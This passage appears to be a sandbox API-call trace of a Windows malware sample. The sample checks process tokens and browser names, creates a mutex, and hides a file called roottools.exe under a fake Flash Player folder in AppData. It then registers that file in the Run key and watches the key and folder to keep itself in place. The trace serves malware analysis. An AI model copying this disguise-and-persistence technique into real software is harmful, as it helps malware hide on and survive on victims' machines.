TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0327.470] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0327.470] GetLastError () returned 0x7a [0327.470] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0327.470] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0327.470] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0327.470] CloseHandle (hObject=0x66c) returned 1 [0327.471] CloseHandle (hObject=0x5b0) returned 1 [0327.471] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0327.471] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0327.471] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0327.471] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0327.471] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0327.471] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0327.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x5b0 [0327.471] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0327.471] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0327.471] GetLastError () returned 0x7a [0327.471] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0327.471] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0327.471] CloseHandle (hObject=0x66c) returned 1 [0327.471] CloseHandle (hObject=0x5b0) returned 1 [0327.471] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0327.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x5b0 [0327.471] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247cd0, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08N") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0327.471] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0327.471] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0327.471] GetLastError () returned 0x7a [0327.471] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0327.471] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0327.471] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0327.471] CloseHandle (hObject=0x66c) returned 1 [0327.471] CloseHandle (hObject=0x5b0) returned 1 [0327.471] lstrcmpiW (lpString1="firefox.exe", lpString2="reader_sl.exe") returned -1 [0327.471] lstrcmpiW (lpString1="chrome.exe", lpString2="reader_sl.exe") returned -1 [0327.471] lstrcmpiW (lpString1="opera.exe", lpString2="reader_sl.exe") returned -1 [0327.471] lstrcmpiW (lpString1="iexplore.exe", lpString2="reader_sl.exe") returned -1 [0327.471] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="reader_sl.exe") returned -1 [0327.471] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="reader_sl.exe") returned -1 [0327.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f8) returned 0x5b0 [0327.471] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0327.471] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0327.471] GetLastError () returned 0x7a [0327.471] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0327.471] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0327.471] CloseHandle (hObject=0x66c) returned 1 [0327.471] CloseHandle (hObject=0x5b0) returned 1 [0327.472] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0327.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f8) returned 0x5b0 [0327.472] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x247e68, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08O") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0327.472] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0327.472] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0327.472] GetLastError () returned 0x7a [0327.472] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0327.472] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0327.472] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0327.472] CloseHandle (hObject=0x66c) returned 1 [0327.472] CloseHandle (hObject=0x5b0) returned 1 [0327.472] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0327.472] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0327.472] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0327.472] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0327.472] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0327.472] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0327.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0x5b0 [0327.472] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x8, TokenHandle=0x275fc5c | out: TokenHandle=0x275fc5c*=0x66c) returned 1 [0327.472] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc44 | out: TokenInformation=0x0, ReturnLength=0x275fc44) returned 0 [0327.472] GetLastError () returned 0x7a [0327.472] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x238ef88, TokenInformationLength=0x24, ReturnLength=0x275fc44 | out: TokenInformation=0x238ef88, ReturnLength=0x275fc44) returned 1 [0327.472] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x275fc74, TokenInformationLength=0x4, ReturnLength=0x275fc58 | out: TokenInformation=0x275fc74, ReturnLength=0x275fc58) returned 1 [0327.472] CloseHandle (hObject=0x66c) returned 1 [0327.472] CloseHandle (hObject=0x5b0) returned 1 [0327.472] GetLengthSid (pSid=0x238ef90*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0327.472] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x594) returned 0x5b0 [0327.472] GetVersionExW (in: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x248650, dwBuildNumber=0x3e50f0, dwPlatformId=0x0, szCSDVersion="\x0f\x08P") | out: lpVersionInformation=0x275fb48*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0327.472] OpenProcessToken (in: ProcessHandle=0x5b0, DesiredAccess=0x20008, TokenHandle=0x275fc74 | out: TokenHandle=0x275fc74*=0x66c) returned 1 [0327.472] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x275fc70 | out: TokenInformation=0x0, ReturnLength=0x275fc70) returned 0 [0327.472] GetLastError () returned 0x7a [0327.472] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x238eda8, TokenInformationLength=0x14, ReturnLength=0x275fc70 | out: TokenInformation=0x238eda8, ReturnLength=0x275fc70) returned 1 [0327.472] GetSidSubAuthorityCount (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x238edb1 [0327.472] GetSidSubAuthority (pSid=0x238edb0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x238edb8 [0327.472] CloseHandle (hObject=0x66c) returned 1 [0327.472] CloseHandle (hObject=0x5b0) returned 1 [0327.472] lstrcmpiW (lpString1="firefox.exe", lpString2="upde25b4796.exe") returned -1 [0327.472] lstrcmpiW (lpString1="chrome.exe", lpString2="upde25b4796.exe") returned -1 [0327.472] lstrcmpiW (lpString1="opera.exe", lpString2="upde25b4796.exe") returned -1 [0327.473] lstrcmpiW (lpString1="iexplore.exe", lpString2="upde25b4796.exe") returned -1 [0327.473] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="upde25b4796.exe") returned -1 [0327.473] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="upde25b4796.exe") returned -1 [0327.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x57c) returned 0x0 [0327.473] VirtualFree (lpAddress=0x240000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0327.473] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x0 Thread: id = 210 os_tid = 0x394 [0312.959] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0312.959] wvnsprintfW (in: pszDest=0x50e9d8, cchDest=3, pszFmt="%02X", arglist=0x50e9b4 | out: pszDest="B3") returned 2 [0312.959] wvnsprintfW (in: pszDest=0x50e9d8, cchDest=3, pszFmt="%02X", arglist=0x50e9b4 | out: pszDest="F6") returned 2 [0312.959] wvnsprintfW (in: pszDest=0x50e9d8, cchDest=3, pszFmt="%02X", arglist=0x50e9b4 | out: pszDest="E5") returned 2 [0312.959] wvnsprintfW (in: pszDest=0x50e9d8, cchDest=3, pszFmt="%02X", arglist=0x50e9b4 | out: pszDest="3F") returned 2 [0312.959] wvnsprintfW (in: pszDest=0x50e9d8, cchDest=3, pszFmt="%02X", arglist=0x50e9b4 | out: pszDest="12") returned 2 [0312.959] wvnsprintfW (in: pszDest=0x50e9d8, cchDest=3, pszFmt="%02X", arglist=0x50e9b4 | out: pszDest="0A") returned 2 [0312.959] wvnsprintfW (in: pszDest=0x50e9d8, cchDest=3, pszFmt="%02X", arglist=0x50e9b4 | out: pszDest="5B") returned 2 [0312.959] wvnsprintfW (in: pszDest=0x50e9d8, cchDest=3, pszFmt="%02X", arglist=0x50e9b4 | out: pszDest="E5") returned 2 [0312.959] wvnsprintfW (in: pszDest=0x50e9d8, cchDest=3, pszFmt="%02X", arglist=0x50e9b4 | out: pszDest="82") returned 2 [0312.959] wvnsprintfW (in: pszDest=0x50e9d8, cchDest=3, pszFmt="%02X", arglist=0x50e9b4 | out: pszDest="5B") returned 2 [0312.959] wvnsprintfW (in: pszDest=0x50e9d8, cchDest=3, pszFmt="%02X", arglist=0x50e9b4 | out: pszDest="9C") returned 2 [0312.959] wvnsprintfW (in: pszDest=0x50e9d8, cchDest=3, pszFmt="%02X", arglist=0x50e9b4 | out: pszDest="06") returned 2 [0312.959] wvnsprintfW (in: pszDest=0x50e9d8, cchDest=3, pszFmt="%02X", arglist=0x50e9b4 | out: pszDest="15") returned 2 [0312.959] wvnsprintfW (in: pszDest=0x50e9d8, cchDest=3, pszFmt="%02X", arglist=0x50e9b4 | out: pszDest="9B") returned 2 [0312.959] wvnsprintfW (in: pszDest=0x50e9d8, cchDest=3, pszFmt="%02X", arglist=0x50e9b4 | out: pszDest="B3") returned 2 [0312.959] wvnsprintfW (in: pszDest=0x50e9d8, cchDest=3, pszFmt="%02X", arglist=0x50e9b4 | out: pszDest="F4") returned 2 [0312.959] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="B3F6E53F120A5BE5825B9C06159BB3F4") returned 0xb8 [0312.960] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0312.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x50e7ee, cbMultiByte=76, lpWideCharStr=0x50e644, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exePPPPĥP誵\x07P\x04") returned 76 [0312.960] PathCombineW (in: pszDest=0x50ea8c, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" [0312.960] PathQuoteSpacesW (in: lpsz="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" | out: lpsz="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"") returned 1 [0312.960] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xfc [0312.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x23cfcf8, cbMultiByte=45, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0312.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x23cfcf8, cbMultiByte=45, lpWideCharStr=0x23cfd38, cchWideChar=46 | out: lpWideCharStr="Software\\Microsoft\\Windows\\Currentversion\\Run") returned 45 [0312.960] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\Currentversion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x12, lpSecurityAttributes=0x0, phkResult=0x50ed34, lpdwDisposition=0x0 | out: phkResult=0x50ed34*=0x104, lpdwDisposition=0x0) returned 0x0 [0312.960] RegSetValueExW (in: hKey=0x104, lpValueName="roottools.exe", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"", cbData=0xe2 | out: lpData="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe\"") returned 0x0 [0312.960] RegFlushKey (hKey=0x104) returned 0x0 [0313.104] RegNotifyChangeKeyValue (hKey=0x104, bWatchSubtree=0, dwNotifyFilter=0x4, hEvent=0xfc, fAsynchronous=1) returned 0x0 [0313.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x50ea0e, cbMultiByte=76, lpWideCharStr=0x50e864, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 76 [0313.104] PathCombineW (in: pszDest=0x50efb0, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" [0313.104] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0313.104] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x50ec84 | out: lpFileSize=0x50ec84*=196608) returned 1 [0313.104] VirtualAlloc (lpAddress=0x0, dwSize=0x30000, flAllocationType=0x3000, flProtect=0x4) returned 0x150000 [0313.104] ReadFile (in: hFile=0x190, lpBuffer=0x150000, nNumberOfBytesToRead=0x30000, lpNumberOfBytesRead=0x50ec94, lpOverlapped=0x0 | out: lpBuffer=0x150000*, lpNumberOfBytesRead=0x50ec94*=0x30000, lpOverlapped=0x0) returned 1 [0313.107] VirtualFree (lpAddress=0x150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0313.108] CloseHandle (hObject=0x190) returned 1 [0313.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x50f366, cbMultiByte=76, lpWideCharStr=0x50f7f0, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 76 [0313.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x50f366, cbMultiByte=62, lpWideCharStr=0x50f1b8, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 62 [0313.108] PathCombineW (in: pszDest=0x50f5e8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0313.108] FindFirstChangeNotificationW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming", bWatchSubtree=1, dwNotifyFilter=0x13) returned 0x190 [0313.108] WaitForMultipleObjects (nCount=0x3, lpHandles=0x50eca8*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0313.876] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0313.876] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0313.876] FindNextChangeNotification (hChangeHandle=0x190) returned 1 [0313.876] WaitForMultipleObjects (nCount=0x3, lpHandles=0x50eca8*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0314.179] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0314.179] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0314.179] FindNextChangeNotification (hChangeHandle=0x190) returned 1 [0314.179] WaitForMultipleObjects (nCount=0x3, lpHandles=0x50eca8*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0314.179] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0314.179] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0314.179] FindNextChangeNotification (hChangeHandle=0x190) returned 1 [0314.179] WaitForMultipleObjects (nCount=0x3, lpHandles=0x50eca8*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0318.322] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0318.322] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0318.322] FindNextChangeNotification (hChangeHandle=0x190) returned 1 [0318.322] WaitForMultipleObjects (nCount=0x3, lpHandles=0x50eca8*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0318.322] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0318.322] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0318.322] FindNextChangeNotification (hChangeHandle=0x190) returned 1 [0318.322] WaitForMultipleObjects (nCount=0x3, lpHandles=0x50eca8*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0318.754] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0318.754] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0318.754] FindNextChangeNotification (hChangeHandle=0x190) returned 1 [0318.754] WaitForMultipleObjects (nCount=0x3, lpHandles=0x50eca8*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0318.754] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0318.754] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0318.754] FindNextChangeNotification (hChangeHandle=0x190) returned 1 [0318.754] WaitForMultipleObjects (nCount=0x3, lpHandles=0x50eca8*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0318.999] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0318.999] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0318.999] FindNextChangeNotification (hChangeHandle=0x190) returned 1 [0319.000] WaitForMultipleObjects (nCount=0x3, lpHandles=0x50eca8*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0319.000] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0319.000] PathFileExistsW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\roottools.exe") returned 1 [0319.000] FindNextChangeNotification (hChangeHandle=0x190) returned 1 [0319.000] WaitForMultipleObjects (nCount=0x3, lpHandles=0x50eca8*=0x8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0328.084] CloseHandle (hObject=0xfc) returned 1 [0328.084] RegCloseKey (hKey=0x104) returned 0x0 [0328.084] ReleaseMutex (hMutex=0xb8) returned 1 [0328.084] CloseHandle (hObject=0xb8) returned 1 Thread: id = 211 os_tid = 0x310 [0312.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x271f462, cbMultiByte=6, lpWideCharStr=0x89730, cchWideChar=10 | out: lpWideCharStr="Acuhci") returned 6 [0312.961] PathCombineW (in: pszDest=0x88f48, pszDir="SOFTWARE\\Microsoft", pszFile="Acuhci" | out: pszDest="SOFTWARE\\Microsoft\\Acuhci") returned="SOFTWARE\\Microsoft\\Acuhci" [0312.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x271f46c, cbMultiByte=8, lpWideCharStr=0x89730, cchWideChar=10 | out: lpWideCharStr="Omegovna") returned 8 [0312.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x271f33a, cbMultiByte=85, lpWideCharStr=0x271f064, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv癦ɱ霰\x08ɱ茶癦霰\x08\x1c绻") returned 85 [0312.961] PathCombineW (in: pszDest=0x89428, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash 